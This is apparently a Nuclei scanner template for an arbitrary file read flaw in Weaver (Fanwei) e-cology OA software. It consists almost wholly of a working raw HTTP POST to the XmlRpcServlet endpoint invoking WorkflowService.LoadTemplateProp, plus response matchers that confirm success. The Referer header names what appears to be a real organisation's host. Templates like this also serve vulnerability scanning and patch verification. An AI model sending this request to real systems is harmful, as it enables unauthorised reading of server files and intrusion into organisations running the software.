id: fanwei_fileRead

info:
  name: 泛微任意文件读取
  author: Str1am
  severity: high
  tags: fanwei,fileRead

requests:
  - raw:
      - |
        POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 208
        Accept-Language: zh-CN,zh;q=0.8
        Accept: */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
        Connection: keep-alive
        Referer: https://zoa.xhby.net/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet
        Cache-Control: max-age=0
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
        <methodName>WorkflowService.LoadTemplateProp</methodName>
        <params>
        <param>
        <value><string>weaver</string></value>
        </param>
        </params>
        </methodCall>


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "methodResponse"
          - "ecology"
        part: body
        condition: and